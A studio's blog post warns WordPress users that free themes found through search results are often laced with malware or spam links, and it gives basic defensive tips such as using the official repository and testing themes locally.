This pretty scary article from WordPressmu.org illustrates some of the pitfalls you may encounter while looking around for a suitable free theme for your WordPress site. According to the research in the article nine out of the top ten google results for the search term "Free WordPress Themes" directs you to sites allowing you to download free themes that have been tampered with and have had malicious code or malware inserted.

Here at northStudio we develop and maintain a range of wordpress sites through our wordpresspro.ca division although the preference in-house is to generally use the more robust and flexible Drupal Content Management System for most client websites.

WordPress is an excellent blogging platform and one which I worked on for a few years before migrating to Drupal. Something that always frustrates me about developing more complex sites with WordPress, is that the quality of the community plugins and themes can vary greatly. There are some hugely useful and very well written plugins and themes for WordPress but finding them usually involves sifting through a sea of half broken, outdated and badly written ones to find out which will work best for you (or which will work at all)

Things improved drastically when WordPress.org started offering a central place to download themes and plugins. User ratings and comments helped too in sifting out clearly broken plugins but as the entire wordpress eco-system continued to blossom and grow, so did the shady edges of cybercriminals looking for a way to target this growth. Currently estimated to power around 10% of the internet with upwards of 6.03 million users, its easy to see why hackers and spammers began to see the WordPress eco-system as an easy target for their exploits. Another factor contributing to this vulnerability is that wordpress primarily attracts people who are looking for a simple way to set up a site or blog. As such they are not necessarily technically savvy and  dont realise the implications of not securing a site properly, or using insecure passwords, or having the incorrect file or folder permissions set which can allow hackers easy access.

Anyone who runs a blog on WordPress today can attest to the barrage of spam most sites start to get within a few hours of being launched. Thankfully the tools for dealing with this spam have improved but there is still administrative overhead dealing with the hundreds of fake comments. A proliferation of "splogs" or spam blogs also flourished alongside the legitimate blogs growth with WordPress.com recently deleting over 800 000 splogs from its hosted blogging service. 

These sites are often scrapers that pull their content from publicly available RSS feeds (or illegally scrape sites) and in most cases, only exist to create back links and references to other sites in an attempt to improve google rankings for the targeted site. With this in mind its clear to see why the sites offering the compromised "free themes" have such high search rankings. Every person who downloads and installs one of their hacked themes on a live server, effectively ends up unintentionally linking to them and providing more reason for Google to see the sites as "popular" and "relevant"

There are a few things you can do to prevent becoming a victim of a hacked theme or plugin

  • Only download wordpress themes and plugins from the official repository at http://wordpress.org/extend
  • Legitimate sites offering free WordPress themes will usually not have the word "Wordpress" somewhere in the url. WordPress is trademarked and if a site is going to violate trademarks it’s likely to be unscrupulous about inserting spam and other code into themes
  • Always use secure passwords with at least one uppercase letter, one lowercase letter, a number and some punctuation
  • Check the plugins usage stats to see if its a popular plugin or not and read user reviews and comments to reduce the possibility of investing time in something that does not work
  • Don't download and use pirated "premium themes" posted on bit-torrent sites. They are almost certainly hiding nasties. If you do, you will deserve the hack or malware that will surely follow

Finally I would like to suggest that you consider switching to Drupal. Thats not to say that similar things couldn't happen with Drupal and externally distributed themes and modules but I find that Drupal.org is much more effective at providing a central repository that effectively allows developers and end users to evaluate whether modules/ themes work, while also allowing direct communication with the module/ theme author. This reduces the need for the developers to distribute their work from their own sites.

If you have recently downloaded a handful of free themes and set them up on your server "just to see", please evaluate where they came from and if necessary re-download them from wordpress.org to make sure that you have the un-compromised versions. If testing new themes from possibly dodgy sites, remember to set them up on a local installation rather than straight onto your live server.

I highly recommend that you read the full article on wordpressmu.org to get a better sense of how these themes are being exploited and for more practical info on how you can avoid them.